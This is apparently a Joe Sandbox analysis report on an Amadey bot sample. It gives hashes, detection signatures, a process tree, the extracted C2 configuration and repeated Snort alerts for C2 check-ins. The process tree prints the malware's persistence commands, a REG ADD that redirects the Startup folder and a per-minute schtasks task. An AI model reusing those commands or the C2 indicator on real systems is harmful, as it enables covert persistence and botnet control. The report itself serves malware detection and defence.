Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report mvoElayshk.exe

Overview

General Information

Sample Name:mvoElayshk.exe
Analysis ID:473548
MD5:231c758869bf91299b69a8aae619aa48
SHA1:33f0e34d02c2a2fbe76a8d80148c9b3bb9647656
SHA256:6a5c86378beea3c4aef5f4a88b8367b1f4a6a7a4578646c081712f2ddda5192f
Tags:Amadeyexe
Infos:

Most interesting Screenshot:

Detection

Amadey
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Yara detected Amadey bot
Multi AV Scanner detection for dropped file
Creates multiple autostart registry keys
Contains functionality to register a low level keyboard hook
Machine Learning detection for sample
.NET source code contains very large array initializations
Contains functionality to inject code into remote processes
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Direct Autorun Keys Modification
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Contains functionality to launch a program with higher privileges
Uses reg.exe to modify the Windows registry
Uses taskkill to terminate processes
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • mvoElayshk.exe (PID: 3220 cmdline: 'C:\Users\user\Desktop\mvoElayshk.exe' MD5: 231C758869BF91299B69A8AAE619AA48)
    • a.exe (PID: 6736 cmdline: 'C:\Users\user\AppData\Local\Temp\a.exe' MD5: F8899BB72B91E110CD5D6DA17861369C)
      • rnyuf.exe (PID: 6908 cmdline: 'C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe' MD5: F8899BB72B91E110CD5D6DA17861369C)
        • cmd.exe (PID: 1256 cmdline: 'C:\Windows\System32\cmd.exe' /C REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\4c423bc94e\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 2220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • reg.exe (PID: 6372 cmdline: REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\4c423bc94e\ MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • schtasks.exe (PID: 3684 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR 'C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe' /F MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 1844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • 1sb1iwyem7.exe (PID: 5384 cmdline: 'C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exe' MD5: 8AB82DE9E761FA26308DAC69D6B855A6)
          • cmd.exe (PID: 4164 cmdline: 'C:\Windows\System32\cmd.exe' /c ''C:\Users\user\AppData\Local\Temp\1sb1iwyem7\KillDuplicate.cmd' 'C:\Users\user\AppData\Local\Temp\1sb1iwyem7' '1sb1iwyem7.exe'' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
            • conhost.exe (PID: 4632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • 1sb1iwyem7.exe (PID: 6268 cmdline: 'C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exe' MD5: 8AB82DE9E761FA26308DAC69D6B855A6)
            • cmd.exe (PID: 4780 cmdline: 'C:\Windows\System32\cmd.exe' /c ''C:\Users\user\AppData\Local\Temp\1sb1iwyem7\KillDuplicate.cmd' 'C:\Users\user\AppData\Local\Temp\1sb1iwyem7' '1sb1iwyem7.exe'' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
              • conhost.exe (PID: 5896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • cmd.exe (PID: 6700 cmdline: C:\Windows\system32\cmd.exe /c TaskList /fo CSV /nh MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
                • tasklist.exe (PID: 5032 cmdline: TaskList /fo CSV /nh MD5: B12E0F9C42075B4B7AD01D0B6A48485D)
              • taskkill.exe (PID: 1316 cmdline: TaskKill /pid 6268 /t /f MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
        • 5mgcqk6jl.exe (PID: 7012 cmdline: 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe' MD5: EC0FC802166AE83C519C5AEA89D65A53)
          • 5mgcqk6jl.exe (PID: 7084 cmdline: 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe' MD5: EC0FC802166AE83C519C5AEA89D65A53)
            • 5mgcqk6jl.exe (PID: 6496 cmdline: 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe' MD5: EC0FC802166AE83C519C5AEA89D65A53)
              • 5mgcqk6jl.exe (PID: 4732 cmdline: 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe' MD5: EC0FC802166AE83C519C5AEA89D65A53)
                • 5mgcqk6jl.exe (PID: 6596 cmdline: 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe' MD5: EC0FC802166AE83C519C5AEA89D65A53)
                  • 5mgcqk6jl.exe (PID: 7004 cmdline: 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe' MD5: EC0FC802166AE83C519C5AEA89D65A53)
                    • 5mgcqk6jl.exe (PID: 4492 cmdline: 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe' MD5: EC0FC802166AE83C519C5AEA89D65A53)
                      • 5mgcqk6jl.exe (PID: 1172 cmdline: 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe' MD5: EC0FC802166AE83C519C5AEA89D65A53)
                        • 5mgcqk6jl.exe (PID: 5480 cmdline: 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe' MD5: EC0FC802166AE83C519C5AEA89D65A53)
                          • 5mgcqk6jl.exe (PID: 816 cmdline: 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe' MD5: EC0FC802166AE83C519C5AEA89D65A53)
  • rnyuf.exe (PID: 6544 cmdline: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe MD5: F8899BB72B91E110CD5D6DA17861369C)
  • 1sb1iwyem7.exe (PID: 5920 cmdline: 'C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exe' MD5: 8AB82DE9E761FA26308DAC69D6B855A6)
    • cmd.exe (PID: 1288 cmdline: 'C:\Windows\System32\cmd.exe' /c ''C:\Users\user\AppData\Local\Temp\1sb1iwyem7\KillDuplicate.cmd' 'C:\Users\user\AppData\Local\Temp\1sb1iwyem7' '1sb1iwyem7.exe'' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 5300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 5568 cmdline: C:\Windows\system32\cmd.exe /c TaskList /fo CSV /nh MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • tasklist.exe (PID: 5500 cmdline: TaskList /fo CSV /nh MD5: B12E0F9C42075B4B7AD01D0B6A48485D)
    • 1sb1iwyem7.exe (PID: 3184 cmdline: 'C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exe' MD5: 8AB82DE9E761FA26308DAC69D6B855A6)
      • cmd.exe (PID: 2108 cmdline: 'C:\Windows\System32\cmd.exe' /c ''C:\Users\user\AppData\Local\Temp\1sb1iwyem7\KillDuplicate.cmd' 'C:\Users\user\AppData\Local\Temp\1sb1iwyem7' '1sb1iwyem7.exe'' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 2464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 2188 cmdline: C:\Windows\system32\cmd.exe /c TaskList /fo CSV /nh MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • tasklist.exe (PID: 5224 cmdline: TaskList /fo CSV /nh MD5: B12E0F9C42075B4B7AD01D0B6A48485D)
  • 1sb1iwyem7.exe (PID: 2740 cmdline: 'C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exe' MD5: 8AB82DE9E761FA26308DAC69D6B855A6)
    • cmd.exe (PID: 4044 cmdline: 'C:\Windows\System32\cmd.exe' /c ''C:\Users\user\AppData\Local\Temp\1sb1iwyem7\KillDuplicate.cmd' 'C:\Users\user\AppData\Local\Temp\1sb1iwyem7' '1sb1iwyem7.exe'' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 6916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 6704 cmdline: C:\Windows\system32\cmd.exe /c TaskList /fo CSV /nh MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • tasklist.exe (PID: 4204 cmdline: TaskList /fo CSV /nh MD5: B12E0F9C42075B4B7AD01D0B6A48485D)
      • taskkill.exe (PID: 5508 cmdline: TaskKill /pid 3184 /t /f MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
    • 1sb1iwyem7.exe (PID: 4624 cmdline: 'C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exe' MD5: 8AB82DE9E761FA26308DAC69D6B855A6)
      • cmd.exe (PID: 5164 cmdline: 'C:\Windows\System32\cmd.exe' /c ''C:\Users\user\AppData\Local\Temp\1sb1iwyem7\KillDuplicate.cmd' 'C:\Users\user\AppData\Local\Temp\1sb1iwyem7' '1sb1iwyem7.exe'' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 5048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 5560 cmdline: C:\Windows\system32\cmd.exe /c TaskList /fo CSV /nh MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • tasklist.exe (PID: 6932 cmdline: TaskList /fo CSV /nh MD5: B12E0F9C42075B4B7AD01D0B6A48485D)
        • taskkill.exe (PID: 5916 cmdline: TaskKill /pid 4624 /t /f MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
  • 5mgcqk6jl.exe (PID: 5456 cmdline: 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe' MD5: EC0FC802166AE83C519C5AEA89D65A53)
    • 5mgcqk6jl.exe (PID: 5008 cmdline: 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe' MD5: EC0FC802166AE83C519C5AEA89D65A53)
      • 5mgcqk6jl.exe (PID: 7060 cmdline: 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe' MD5: EC0FC802166AE83C519C5AEA89D65A53)
        • 5mgcqk6jl.exe (PID: 5364 cmdline: 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe' MD5: EC0FC802166AE83C519C5AEA89D65A53)
  • rnyuf.exe (PID: 5388 cmdline: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe MD5: F8899BB72B91E110CD5D6DA17861369C)
  • 5mgcqk6jl.exe (PID: 6996 cmdline: 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe' MD5: EC0FC802166AE83C519C5AEA89D65A53)
  • cleanup

Malware Configuration

Threatname: Amadey

{"C2 url": "46.17.96.36/k8FppT/index.php", "Version": "2.50", "Install File": "rnyuf.exe"}

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AmadeyYara detected Amadey botJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000005.00000002.996019062.0000000004707000.00000004.00000001.sdmpJoeSecurity_AmadeyYara detected Amadey botJoe Security
      00000005.00000002.927011329.000000000131A000.00000004.00000020.sdmpJoeSecurity_AmadeyYara detected Amadey botJoe Security
        00000005.00000002.933021893.000000000137E000.00000004.00000020.sdmpJoeSecurity_AmadeyYara detected Amadey botJoe Security
          00000005.00000002.927044420.0000000001359000.00000004.00000020.sdmpJoeSecurity_AmadeyYara detected Amadey botJoe Security
            Process Memory Space: rnyuf.exe PID: 6908JoeSecurity_AmadeyYara detected Amadey botJoe Security

              Sigma Overview

              System Summary:

              barindex
              Sigma detected: Direct Autorun Keys ModificationShow sources
              Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\4c423bc94e\, CommandLine: REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\4c423bc94e\, CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: 'C:\Windows\System32\cmd.exe' /C REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\4c423bc94e\, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1256, ProcessCommandLine: REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\4c423bc94e\, ProcessId: 6372

              Jbx Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Found malware configurationShow sources
              Source: 11.0.rnyuf.exe.f00000.0.unpackMalware Configuration Extractor: Amadey {"C2 url": "46.17.96.36/k8FppT/index.php", "Version": "2.50", "Install File": "rnyuf.exe"}
              Multi AV Scanner detection for submitted fileShow sources
              Source: mvoElayshk.exeVirustotal: Detection: 55%Perma Link
              Source: mvoElayshk.exeReversingLabs: Detection: 69%
              Antivirus / Scanner detection for submitted sampleShow sources
              Source: mvoElayshk.exeAvira: detected
              Multi AV Scanner detection for dropped fileShow sources
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\1sb1iwyem7[1].exeReversingLabs: Detection: 57%
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\5mgcqk6jl[1].exeReversingLabs: Detection: 57%
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeReversingLabs: Detection: 57%
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeReversingLabs: Detection: 61%
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeReversingLabs: Detection: 57%
              Source: C:\Users\user\AppData\Local\Temp\a.exeReversingLabs: Detection: 61%
              Machine Learning detection for sampleShow sources
              Source: mvoElayshk.exeJoe Sandbox ML: detected
              Machine Learning detection for dropped fileShow sources
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\a.exeJoe Sandbox ML: detected
              Source: mvoElayshk.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
              Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: mvoElayshk.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
              Source: Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: mvoElayshk.exe
              Source: C:\Users\user\AppData\Local\Temp\a.exeCode function: 3_2_0101B0C2 FindFirstFileExW,3_2_0101B0C2
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeCode function: 5_2_00F1B0C2 FindFirstFileExW,5_2_00F1B0C2
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeCode function: 11_2_00F1B0C2 FindFirstFileExW,11_2_00F1B0C2
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 13_2_00409931 ??2@YAPAXI@Z,FindFirstFileW,FindClose,13_2_00409931
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 13_2_00403327 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetCurrentDirectoryW,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,13_2_00403327
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 13_2_00403442 FindFirstFileW,FindClose,SetFileAttributesW,DeleteFileW,13_2_00403442
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 13_2_00404402 FindFirstFileW,FindClose,SetLastError,CompareFileTime,13_2_00404402
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 16_2_00409931 ??2@YAPAXI@Z,FindFirstFileW,FindClose,16_2_00409931
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 16_2_00403327 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetCurrentDirectoryW,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,16_2_00403327
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 16_2_00403442 FindFirstFileW,FindClose,SetFileAttributesW,DeleteFileW,16_2_00403442
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 16_2_00404402 FindFirstFileW,FindClose,SetLastError,CompareFileTime,16_2_00404402
              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\1sb1iwyem7Jump to behavior
              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\7ZipSfx.001Jump to behavior
              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior

              Networking:

              barindex
              Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49735 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49803 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49805 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49804 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49806 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49808 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49809 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49811 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49813 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49814 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49816 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49817 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49819 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49820 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49822 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49823 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49825 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49827 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49828 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49830 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49831 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49833 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49834 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49835 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49836 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49838 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49839 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49841 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49843 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49844 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49845 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49846 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49847 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49848 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49850 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49851 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49853 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49854 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49856 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49857 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49858 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49860 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49861 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49863 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49864 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49866 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49868 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49869 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49870 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49871 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49872 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49874 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49875 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49877 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49878 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49879 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49881 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49882 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49884 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49885 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49886 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49888 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49889 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49891 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49893 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49894 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49896 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49897 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49899 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49900 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49902 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49903 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49904 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49905 -> 46.17.96.36:80
